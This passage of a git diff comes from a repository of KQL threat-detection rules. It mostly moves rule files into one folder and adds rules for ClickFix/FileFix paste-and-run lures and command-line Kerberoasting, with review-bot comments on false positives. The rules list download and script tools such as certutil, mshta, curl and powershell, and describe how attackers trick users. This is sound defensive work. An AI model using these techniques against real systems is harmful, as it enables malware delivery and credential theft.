+++ b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
@@ -9,4 +9,4 @@ // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 DeviceProcessEvents -| where (ProcessCommandLine contains "#" and FolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file +| where (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql rename to KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql 
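Review bot: The thirteen `ProcessCommandLine contains "            "` clauses on the new `| where` line all render here as the same run of plain ASCII spaces, so either the converter flattened the distinct whitespace code points the source rule lists, or twelve of the clauses are redundant and the rule keys only on ordinary space runs, which is considerably noisier than the intended padding characters. Please confirm the emitted .kql still carries the original code points before this is merged. A one-line comment above the query, e.g. `// Whitespace padding matched: <list the code points from the source rule>`, would make that reviewable without a hex dump. The rule header (file lines 1–8) is outside the hunk.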
diff --git a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_extrac32_execution.kql
rename to KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql
diff --git a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql
rename to KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql
diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql
rename to KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql
diff --git a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql
rename to KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql
diff --git a/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql
new file mode 100644
index 00000000..565e4e2b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql
@@ -0,0 +1,15 @@ +// Title: Suspicious FileFix Execution Pattern +// Author: 0xFustang, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-24 +// Level: high +// Description: Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation. +// This attack typically begins when users visit malicious websites impersonating legitimate services or news platforms, +// which may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content. +// The clipboard content usually contains commands that download and execute malware, such as information stealing tools. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004 +// False Positives: +// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools + +DeviceProcessEvents +| where (ProcessCommandLine contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")) and ((ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") or (ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains 
"cmd" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "finger" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "schtasks" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
rename to KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone.kql b/KQL/rules/windows/process_creation/suspicious_git_clone.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/suspicious_git_clone.kql
rename to KQL/rules/windows/process_creation/suspicious_git_clone.kql
diff --git a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql
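Review bot: The keyword half of the final `or` is satisfied on its own by everyday words such as `account`, `human`, `identity` or `verify`, so a browser handing a URL whose `#` fragment contains one of them to a protocol handler or helper application would match without any command interpreter involved; the False Positives header does not mention this, and it is worth considering whether the keyword group should be required together with the interpreter/LOLBIN group rather than as an alternative to it. Suggested header line: `// - Protocol-handler or helper-app launches where the browser passes a URL whose "#" fragment contains one of the keywords`. KQL `contains` is also case-insensitive and substring-based, so `cmd`, `finger` and `human` match inside longer tokens; a short comment stating that this is intentional would keep the next maintainer from tightening it to `has` by accident. The `| where` line is wrapped across two page lines here; the rule is otherwise complete within the hunk.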
diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql b/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql
rename to KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql b/KQL/rules/windows/process_creation/suspicious_gup_usage.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_gup_usage.kql
rename to KQL/rules/windows/process_creation/suspicious_gup_usage.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql b/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql
rename to KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql
rename to KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql
diff --git a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql b/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql
similarity index 100%
rename from KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql
rename to KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql
diff --git a/KQL/rules/Persistence/suspicious_iis_module_registration.kql b/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_iis_module_registration.kql
rename to KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
rename to KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql
rename to KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql
diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql
rename to KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql rename to KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql diff --git a/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql new file mode 100644 index 00000000..01f2f7e1 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql @@ -0,0 +1,15 @@ +// Title: Suspicious Kerberos Ticket Request via CLI +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-18 +// Level: high +// Description: Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class. +// Threat actors may use command line interfaces to request Kerberos tickets for service accounts in order to +// perform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse +// techniques like silver ticket attacks. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Legitimate command line usage by administrators or security tools. + +DeviceProcessEvents +| where (ProcessCommandLine contains "System.IdentityModel.Tokens.KerberosRequestorSecurityToken" and ProcessCommandLine contains ".GetRequest()") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll"))) \ No newline at end of file 
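Review bot: Both `contains` terms in the new `| where` line must appear in `ProcessCommandLine`, so the rule only fires when `System.IdentityModel.Tokens.KerberosRequestorSecurityToken` and `.GetRequest()` are placed literally on the command line; the same code run from a script file or behind an encoded command line produces no match here, and the header does not say so. Suggest adding to the header comments: `// Coverage: command-line only; script-file and encoded invocations need PowerShell script block logging (the encoded case is covered separately by suspicious_encoded_powershell_command_line.kql).` The rule is complete within the hunk.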
diff --git a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql
similarity index 100%
rename from KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql
rename to KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql
diff --git a/KQL/rules/Credential Access/suspicious_key_manager_access.kql b/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql
similarity index 100%
rename from KQL/rules/Credential Access/suspicious_key_manager_access.kql
rename to KQL/rules/windows/process_creation/suspicious_key_manager_access.kql
diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
similarity index 100%
rename from KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
rename to KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
diff --git a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql
similarity index 100%
rename from KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql
rename to KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql
diff --git a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql
similarity index 100%
rename from KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql
rename to KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql
rename to KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql
rename to KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql
rename to KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql b/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql
rename to KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql
diff --git a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql
rename to KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql
rename to KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
rename to KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql
rename to KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql
diff --git a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
rename to KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
diff --git a/KQL/rules/Discovery/suspicious_network_command.kql b/KQL/rules/windows/process_creation/suspicious_network_command.kql
similarity index 100%
rename from KQL/rules/Discovery/suspicious_network_command.kql
rename to KQL/rules/windows/process_creation/suspicious_network_command.kql
diff --git a/KQL/rules/Persistence/suspicious_new_service_creation.kql b/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_new_service_creation.kql
rename to KQL/rules/windows/process_creation/suspicious_new_service_creation.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
rename to KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql b/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql
rename to KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql
diff --git a/KQL/rules/Execution/suspicious_outlook_child_process.kql b/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_outlook_child_process.kql
rename to KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql
rename to KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql
diff --git a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
rename to KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql b/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql
rename to KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql
diff --git a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql b/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql
rename to KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
rename to KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
diff --git a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql
rename to KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql
diff --git a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql
rename to KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql
diff --git a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql
rename to KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql
rename to KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql
diff --git a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql
similarity index 100%
rename from KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql
rename to KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql
diff --git a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_powershell_parameter_substring.kql
rename to KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql
diff --git a/KQL/rules/Execution/suspicious_powershell_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_powershell_parent_process.kql
rename to KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql
diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
rename to KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql
diff --git a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql
diff --git a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql
rename to KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql rename to KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_process_parents.kql b/KQL/rules/windows/process_creation/suspicious_process_parents.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_process_parents.kql rename to KQL/rules/windows/process_creation/suspicious_process_parents.kql diff --git a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql rename to KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql diff --git a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql b/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_process_start_locations.kql rename to KQL/rules/windows/process_creation/suspicious_process_start_locations.kql diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql rename to KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql 
diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql rename to KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql diff --git a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql diff --git a/KQL/rules/Execution/suspicious_program_names.kql b/KQL/rules/windows/process_creation/suspicious_program_names.kql similarity index 100% rename from KQL/rules/Execution/suspicious_program_names.kql rename to KQL/rules/windows/process_creation/suspicious_program_names.kql diff --git a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql diff --git a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql b/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_query_of_machineguid.kql rename to 